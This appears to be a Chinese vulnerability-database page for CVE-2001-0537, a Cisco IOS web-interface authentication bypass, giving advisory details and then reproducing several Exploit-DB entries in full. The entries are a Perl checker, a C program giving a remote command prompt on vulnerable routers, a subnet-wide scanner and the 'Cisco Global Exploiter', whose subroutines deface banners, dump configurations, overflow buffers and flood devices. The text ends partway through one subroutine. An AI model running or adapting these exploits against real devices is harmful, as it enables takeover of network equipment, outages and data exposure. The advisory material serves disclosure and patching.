CVE-2001-0537
CVSS9.3
发布时间 :2001-07-21 00:00:00
修订时间 :2008-09-05 00:00:00
NMCOE    

[原文]HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.


[CNNVD]Cisco IOS Web配置接口安全认证可被绕过漏洞(CNNVD-200107-164)

        
        IOS是Cisco公司开发的路由器固件。IOS支持很多Cisoco设备(包括路由器和交换机)。
        在Cisco IOS 11.3开始的版本存在一个安全问题,如果它开放了Web管理接口,将允许任意远程攻击者获取该设备的完全的管理权限。
        攻击者只需要构造一个如下的URL:
        http:///level/xx/exec/....
        这里的xx是一个从16-99之间的整数。对于不同的设备,这个数值可能是不同的,但是攻击者仅需要测试84次即可找到正确的数值。
        这个问题可能导致远程用户获取完全的管理权限,并进一步对网络进行渗透,也可能造成拒绝服务攻击漏洞。
        

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-287 [认证机制不恰当]

- CPE (受影响的平台与产品)

cpe:/o:cisco:ios:12.0%2810%29w5%2818g%29Cisco IOS 12.0 (10)W5(18g)
cpe:/o:cisco:ios:12.1xrCisco IOS 12.1XR
cpe:/o:cisco:ios:11.3tCisco IOS 11.3T
cpe:/o:cisco:ios:12.0xiCisco IOS 12.0XI
cpe:/o:cisco:ios:12.1xvCisco IOS 12.1XV
cpe:/o:cisco:ios:12.0scCisco IOS 12.0SC
cpe:/o:cisco:ios:12.0sCisco IOS 12.0S
cpe:/o:cisco:ios:12.0Cisco IOS 12.0
cpe:/o:cisco:ios:12.2xeCisco IOS 12.2XE
cpe:/o:cisco:ios:12.1xwCisco IOS 12.1XW
cpe:/o:cisco:ios:12.0xrCisco IOS 12.0XR
cpe:/o:cisco:ios:12.2xdCisco IOS 12.2XD
cpe:/o:cisco:ios:12.1tCisco IOS 12.1T
cpe:/o:cisco:ios:12.1ezCisco IOS 12.1EZ
cpe:/o:cisco:ios:12.2xhCisco IOS 12.2XH
cpe:/o:cisco:ios:12.1xfCisco IOS 12.1XF
cpe:/o:cisco:ios:12.2xqCisco IOS 12.2XQ
cpe:/o:cisco:ios:12.1xxCisco IOS 12.1XX
cpe:/o:cisco:ios:12.1xbCisco IOS 12.1XB
cpe:/o:cisco:ios:12.1xgCisco IOS 12.1XG
cpe:/o:cisco:ios:12.0xpCisco IOS 12.0XP
cpe:/o:cisco:ios:12.1xlCisco IOS 12.1XL
cpe:/o:cisco:ios:12.1xcCisco IOS 12.1XC
cpe:/o:cisco:ios:12.0xgCisco IOS 12.0XG
cpe:/o:cisco:ios:12.0wtCisco IOS 12.0WT
cpe:/o:cisco:ios:12.2Cisco IOS 12.2
cpe:/o:cisco:ios:12.1xtCisco IOS 12.1XT
cpe:/o:cisco:ios:12.0%2814%29w5%2820%29Cisco IOS 12.0 (14)W5(20)
cpe:/o:cisco:ios:12.1ydCisco IOS 12.1YD
cpe:/o:cisco:ios:12.0slCisco IOS 12.0SL
cpe:/o:cisco:ios:12.0xsCisco IOS 12.0XS
cpe:/o:cisco:ios:12.1xpCisco IOS 12.1XP
cpe:/o:cisco:ios:12.0%287%29xkCisco IOS 12.0 (7)XK
cpe:/o:cisco:ios:12.1xsCisco IOS 12.1XS
cpe:/o:cisco:ios:11.3dbCisco IOS 11.3DB
cpe:/o:cisco:ios:12.1xjCisco IOS 12.1XJ
cpe:/o:cisco:ios:12.1xzCisco IOS 12.1XZ
cpe:/o:cisco:ios:12.0xmCisco IOS 12.0XM
cpe:/o:cisco:ios:12.0dbCisco IOS 12.0DB
cpe:/o:cisco:ios:12.1xuCisco IOS 12.1XU
cpe:/o:cisco:ios:12.1xiCisco IOS 12.1XI
cpe:/o:cisco:ios:11.3xaCisco IOS 11.3 XA
cpe:/o:cisco:ios:12.0stCisco IOS 12.0ST
cpe:/o:cisco:ios:12.0xjCisco IOS 12.0XJ
cpe:/o:cisco:ios:12.1yaCisco IOS 12.1YA
cpe:/o:cisco:ios:11.3Cisco IOS 11.3
cpe:/o:cisco:ios:12.1ycCisco IOS 12.1YC
cpe:/o:cisco:ios:11.3naCisco IOS 11.3 NA
cpe:/o:cisco:ios:12.0xlCisco IOS 12.0XL
cpe:/o:cisco:ios:12.1xeCisco IOS 12.1XE
cpe:/o:cisco:ios:12.0xuCisco IOS 12.0XU
cpe:/o:cisco:ios:12.1xdCisco IOS 12.1XD
cpe:/o:cisco:ios:11.3maCisco IOS 11.3 MA
cpe:/o:cisco:ios:11.3haCisco IOS 11.3 HA
cpe:/o:cisco:ios:12.1cxCisco IOS 12.1CX
cpe:/o:cisco:ios:12.1daCisco IOS 12.1DA
cpe:/o:cisco:ios:12.1eyCisco IOS 12.1EY
cpe:/o:cisco:ios:12.0%285%29xkCisco IOS 12.0 (5)XK
cpe:/o:cisco:ios:12.1xaCisco IOS 12.1XA
cpe:/o:cisco:ios:12.0dcCisco IOS 12.0DC
cpe:/o:cisco:ios:12.1Cisco IOS 12.1
cpe:/o:cisco:ios:12.1aaCisco IOS 12.1AA
cpe:/o:cisco:ios:12.0xbCisco IOS 12.0XB
cpe:/o:cisco:ios:12.1dbCisco IOS 12.1DB
cpe:/o:cisco:ios:12.0xeCisco IOS 12.0XE
cpe:/o:cisco:ios:12.0xqCisco IOS 12.0XQ
cpe:/o:cisco:ios:12.1yfCisco IOS 12.1YF
cpe:/o:cisco:ios:12.0xdCisco IOS 12.0XD
cpe:/o:cisco:ios:12.1xkCisco IOS 12.1XK
cpe:/o:cisco:ios:12.2xaCisco IOS 12.2XA
cpe:/o:cisco:ios:11.3aaCisco IOS 11.3AA
cpe:/o:cisco:ios:12.0wcCisco IOS 12.0WC
cpe:/o:cisco:ios:12.1ecCisco IOS 12.1EC
cpe:/o:cisco:ios:11.3daCisco IOS 11.3 DA
cpe:/o:cisco:ios:12.0xaCisco IOS 12.0XA
cpe:/o:cisco:ios:12.1eCisco IOS 12.1E
cpe:/o:cisco:ios:12.0daCisco IOS 12.0DA
cpe:/o:cisco:ios:12.1exCisco IOS 12.1EX
cpe:/o:cisco:ios:12.0xhCisco IOS 12.0XH
cpe:/o:cisco:ios:12.1xqCisco IOS 12.1XQ
cpe:/o:cisco:ios:12.0xvCisco IOS 12.0Xv
cpe:/o:cisco:ios:12.0xfCisco IOS 12.0XF
cpe:/o:cisco:ios:12.0xcCisco IOS 12.0XC
cpe:/o:cisco:ios:12.1xhCisco IOS 12.1XH
cpe:/o:cisco:ios:12.1xyCisco IOS 12.1XY
cpe:/o:cisco:ios:12.0tCisco IOS 12.0T
cpe:/o:cisco:ios:12.1dcCisco IOS 12.1DC
cpe:/o:cisco:ios:12.0xnCisco IOS 12.0XN
cpe:/o:cisco:ios:12.2tCisco IOS 12.2T
cpe:/o:cisco:ios:12.1ybCisco IOS 12.1YB
cpe:/o:cisco:ios:12.1xmCisco IOS 12.1XM

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5663Cisco IOS HTTP Authorization Circumvention Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0537
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0537
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-164
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2001-14.html
(VENDOR_ADVISORY)  CERT  CA-2001-14
http://www.securityfocus.com/bid/2936
(VENDOR_ADVISORY)  BID  2936
http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
(VENDOR_ADVISORY)  CISCO  20010627 IOS HTTP authorization vulnerability
http://xforce.iss.net/static/6749.php
(UNKNOWN)  XF  cisco-ios-admin-access(6749)
http://www.securityfocus.com/archive/1/Pine.LNX.3.96.1010702134611.22995B-100000@Lib-Vai.lib.asu.edu
(UNKNOWN)  BUGTRAQ  20010702 Cisco device HTTP exploit...
http://www.securityfocus.com/archive/1/4.3.2.7.2.20010629095801.0c3e6a70@brussels.cisco.com
(UNKNOWN)  BUGTRAQ  20010629 Re: Cisco Security Advisory: IOS HTTP authorization vulnerability
http://www.securityfocus.com/archive/1/20010703011650.60515.qmail@web14910.mail.yahoo.com
(UNKNOWN)  BUGTRAQ  20010702 ios-http-auth.sh
http://www.securityfocus.com/archive/1/1601227034.20010702112207@olympos.org
(UNKNOWN)  BUGTRAQ  20010702 Cisco IOS HTTP Configuration Exploit
http://www.osvdb.org/578
(UNKNOWN)  OSVDB  578
http://www.ciac.org/ciac/bulletins/l-106.shtml
(UNKNOWN)  CIAC  L-106

- 漏洞信息

Cisco IOS Web配置接口安全认证可被绕过漏洞
高危 未知
2001-07-21 00:00:00 2005-05-02 00:00:00
远程  
        
        IOS是Cisco公司开发的路由器固件。IOS支持很多Cisoco设备(包括路由器和交换机)。
        在Cisco IOS 11.3开始的版本存在一个安全问题,如果它开放了Web管理接口,将允许任意远程攻击者获取该设备的完全的管理权限。
        攻击者只需要构造一个如下的URL:
        http:///level/xx/exec/....
        这里的xx是一个从16-99之间的整数。对于不同的设备,这个数值可能是不同的,但是攻击者仅需要测试84次即可找到正确的数值。
        这个问题可能导致远程用户获取完全的管理权限,并进一步对网络进行渗透,也可能造成拒绝服务攻击漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时禁止有问题设备的Web管理功能。
        厂商补丁:
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(CI-01.08)以及相应补丁:
        CI-01.08:IOS HTTP authorization vulnerability
        链接:
        您可以在下列地址看到公告的详细内容,同时根据您使用的Cisco设备的型号,选择相应的补丁或升级版本:
        
        http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

- 漏洞信息 (20975)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (1) (EDBID:20975)
hardware remote
2001-06-27 Verified
0 cronos
N/A [点击下载]
source: http://www.securityfocus.com/bid/2936/info

IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.

It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.

This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 

#!/usr/bin/perl
# modified roelof's uni.pl
# to check cisco ios http auth bug
# cronos <cronos@olympos.org>
use Socket;
print "enter IP (x.x.x.x): ";
$host= <STDIN>;
chop($host);
$i=16;
$port=80;
$target = inet_aton($host);
$flag=0;
LINE: while ($i<100) { 
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
foreach $line (@results){
        $line=~ tr/A-Z/a-z/;
        if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
        if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
} 
        if ($flag==1){print "Not Vulnerable with $i\n\r";}
                else {print "$line Vulnerable with $i\n\r"; last LINE; }
        $i++;
sub sendraw {
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
}
		

- 漏洞信息 (20976)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (2) (EDBID:20976)
hardware remote
2001-06-27 Verified
0 Eliel C. Sardanons
N/A [点击下载]
source: http://www.securityfocus.com/bid/2936/info
 
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
 
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
 
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 

/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
 * to compile:
 * bash# gcc -o cisco cisco.c 
 */

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define HTTP_PORT 80
#define PROMPT "\ncisco$ "

int usage (char *progname) {
        printf ("Usage:\n\t%s server\n", progname);
        exit(-1);
}                                                               
        
int main (int argc, char *argv[]) {
        struct hostent *he;
        struct sockaddr_in sin;
        int sck, i;
        char command[256], buffer[512];
        if (argc < 2)
                usage(argv[0]);
        if ((he = gethostbyname(argv[1])) == NULL) {
                perror("host()");
                exit(-1);
        }
        sin.sin_family = AF_INET;
        sin.sin_port = htons(HTTP_PORT);
        sin.sin_addr = *((struct in_addr *)he->h_addr);
        while (1) {
                if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
                        perror("socket()");
                        exit(-1);
                }
                if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
                        perror ("connect()");
                        exit(-1);
                }
                printf (PROMPT);
                fgets (command, 256, stdin);
                if (strlen(command) == 1) 
                        break;
                for (i=0;i<strlen(command);i++) {
                        if (command[i] == ' ')
                                command[i] = '/';
                }
                snprintf (buffer, sizeof(buffer), 
                                                        "GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command); 
                write (sck, buffer, strlen(buffer));
                memset (buffer, 0, sizeof(buffer));
                while ((read (sck, buffer, sizeof(buffer))) != 0) {
                        if ((strstr(buffer, "CR</A>")) != 0) {
                                printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
                                memset (buffer, 0, sizeof(buffer));
                                break;
                        } else if ((strstr(buffer, "Unauthorized")) != 0) {
                                printf ("Server not vulnerable\n");
                                exit(-1);
                        } else {
                                printf ("%s", buffer);
                                memset (buffer, 0, sizeof(buffer));
                        }
                 }
        }
        printf ("Thanks...\n");
        exit(0);
}
		

- 漏洞信息 (20977)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (3) (EDBID:20977)
hardware remote
2001-03-07 Verified
0 hypoclear
N/A [点击下载]
source: http://www.securityfocus.com/bid/2936/info
  
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
  
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
  
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 

#!/usr/bin/perl
#
# Bulk Scanner for the Cisco IOS HTTP Configuration Arbitrary
# Administrative Access Vulnerability
# Found: 06-27-01 - Bugtraq ID: 2936
# Written by hypoclear on 07-03-01
#
# usage: ./IOScan.pl <start ip> <end ip>
# Note: start and end ip must be a Class B or C network
# example: ./IOScan 192.168.0.0 192.168.255.255
#
# hypoclear - hypoclear@jungle.net - http://hypoclear.cjb.net
# This and all of my programs fall under my disclaimer, which
# can be found at: http://hypoclear.cjb.net/hypodisclaim.txt

use IO::Socket; 

die "\nusage: $0 <start ip> <end ip>
Note:  start and end ip must be a Class B or C network
ex:   ./IOScan 192.168.0.0 192.168.255.255\n\n" unless @ARGV > 0;
$num = 16; $ipcount = 0; $vuln = 0;

if (defined $ARGV[1])
 { $currentIP = $ARGV[0]; $endIP = $ARGV[1];
   while(1)
    { @CURIP = split(/\./,$currentIP);
      if (($CURIP[2] > 255) && ($CURIP[3] > 255))
       { scanEnd();
       }
      print "Scanning $currentIP\n";
      scan($currentIP);
      if ($currentIP eq $endIP)
       { scanEnd();
       }
      if ($CURIP[3] < 255)
       { $CURIP[3]++;
       }
      else
       { $CURIP[2]++;
         $CURIP[3]=0;
       }
      $currentIP = "";
      foreach $item (@CURIP)
        { $currentIP .= "$item.";
        }
      $currentIP =~ s/\.$//;
      $ipcount++;
     }
 }


sub scan
  { while ($num <100)
      { $IP = $_[0];
        sender("GET /level/$num/exec/- HTTP/1.0\n\n");
        if ($webRecv =~ /200 ok/)
         { $vuln++;
           open(OUT,">>ios.out") || die "Can't write to file";
           print OUT "$IP is Vulnerable\n";
           close(OUT);
           $num = 101;
         }
        $num++;
      }
     $num = 16;
  }


sub sender
  { $sendsock = IO::Socket::INET -> new(Proto     => 'tcp',
                                        PeerAddr  => $IP,
                                        PeerPort  => 80,
                                        Type      => SOCK_STREAM,
                                        Timeout   => 1);
        unless($sendsock){die "Can't connect to $ARGV[0]"}
   $sendsock->autoflush(1);

   $sendsock -> send($_[0]);
   $webRecv = ""; while(<$sendsock>){$webRecv .= $_} $webRecv =~ s/\n//g;
   close $sendsock;
  }


sub scanEnd
  { print "\nScanned $ipcount ip addresses, $vuln addresses found vulnerable.\n";
    if ($vuln > 0) {print "Check ios.out for vulnerable addresses.";}
    die "\n";
  }
		

- 漏洞信息 (20978)

Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (4) (EDBID:20978)
hardware remote
2001-06-27 Verified
0 blackangels
N/A [点击下载]
source: http://www.securityfocus.com/bid/2936/info
   
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
   
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
   
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  -close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);

  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
